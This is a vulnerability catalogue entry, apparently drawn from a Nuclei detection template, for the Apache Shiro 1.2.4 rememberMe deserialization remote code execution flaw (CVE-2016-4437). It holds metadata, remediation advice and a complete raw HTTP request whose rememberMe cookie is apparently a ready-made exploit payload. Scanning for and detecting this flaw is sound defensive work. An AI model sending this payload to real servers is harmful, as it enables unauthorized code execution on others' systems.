| Title | Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability |
|---|---|
| Author | iamnoooob,rootxharsh,pdresearch |
| Severity | High |
| Impact | Remote code execution |
| Remediation | Upgrade to a patched version of Apache Shiro |
| CVSS Score | 8.1 |
| EPSS Score | 0.94303 |
| CVE ID | CVE-2016-4437 |
| CWE ID | CWE-284 |
| Tags | cve2016 cve apache rce kev packetstorm shiro deserialization oast vkev vuln |
Apache Shiro before 1.2.5, when a cipher key has not been configured for the “remember me” feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.13
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: rememberMe=QUVTL0NCQy9QS0NTNVBhZGeRj7DtJG/uBFDyA7QMIBxFqr127Bsw6rsPZBZo+OBwLF16C7fR1Rc5a5WdwXscgWx90a+HsDmDV0ckTEf95f+rT6YWy8TT45APLlb2pPhlVyZc7vAwdvtfIue6nSLk/n6LPA4PZN74EYMhmumEiZ5D2WxeriziJDKj9LC+4FJq6ma4ojfr0qrOhZt5MjeWfj+mFIBdA+/577XxGnCYHSpldBVyciHS+08YMshnmVxQppKqroi6I2qfe46SuTlIHyxeRnJvKlG8eIwPXhkI10RkRmqpdOUXw0HA3Kyj7Oefrk7u1x28w5sgCavV/VTAeEx0qGs3pB7UwFTnJ40PiCMyM7IWIQpFjnOFduH7pJ55ewtpT/aW+LTP3Xm1/EMMWpdl3EQYQqIgiwNZ6HVan7aZMyXJVPK3YqYAWTbkVch1ZNQci19f2PfTVfoaidBpiQ==
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-4437.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-4437.pcap
N/AN/A